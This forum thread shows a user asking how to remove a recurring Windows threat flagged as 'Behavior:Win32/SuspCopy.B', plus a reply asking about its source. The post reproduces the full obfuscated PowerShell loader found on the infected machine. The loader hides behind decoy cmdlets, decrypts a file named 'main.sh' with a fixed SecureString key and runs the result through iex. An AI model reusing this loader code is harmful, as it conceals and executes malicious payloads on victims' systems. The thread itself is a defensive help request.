Forum Discussion

MarcoMangiante's avatar
MarcoMangiante
Iron Contributor
Sep 08, 2021

Need help with suspicious "Behavior:Win32/SuspCopy.B"

Hello,

the system of a colleague is trying to block various attempt of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus block it but after some times it find it again; the threath create a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivurs find a new attempt, a pop up shows that a particular .tmp files is not found: the pop up is a wsh pop up and I suppose a vbscript is executed when there is this issue.

One of the file that I have found is a powershell script like this:

try{Import-Certificate:Import-StartLayout
Get-PSSessionConfiguration:Import-BinaryMiLog
Unregister-UevTemplate:Set-AppvPublishingServer}catch{

$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
try{Add-AppxPackage:Enable-PSBreakpoint
Invoke-CommandInDesktopPackage:Get-RunspaceDebug
Clear-UevConfiguration:Debug-Process}catch{}
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
$pAWzZWnnbaODWSIlGcI=@(1..16);
$wXXale=[System.Runtime.InteropServices.Marshal]
$FJZARstrPhaUvJ= Get-Content "main.sh"
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
try{Show-EventLog:Get-WheaMemoryPolicy
Get-NonRemovableAppsPolicy:Set-AppLockerPolicy
Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';}
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
try{Write-Host:Publish-AppvClientPackage
Set-LocalUser:Invoke-WmiMethod
Set-WmiInstance:New-WindowsImage}catch{}
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}

I also tried to do a scan with Microsoft Security Scanner but without a success.

Has someone any idea how I could eradicate this threath?

 

--

Regards

  • rs8091's avatar
    rs8091
    Copper Contributor
    Interesting, does your colleague know the source of the script? Are you able to quarantine the file from defender atp console?
    • MarcoMangiante's avatar
      MarcoMangiante
      Iron Contributor

      Hello rs8091 

      no, my colleague doesn't know how her system is infected. We activated the preview of Microsoft Defender Endpoint P1 and I can see this:

       

      These are not generated by that file but I have seen that in many random directory that the threat create there is always a powershell file with that code inside.

      I don't know if I can quarantine it.

      Any help is appreciated.

       

      Thanks.

Resources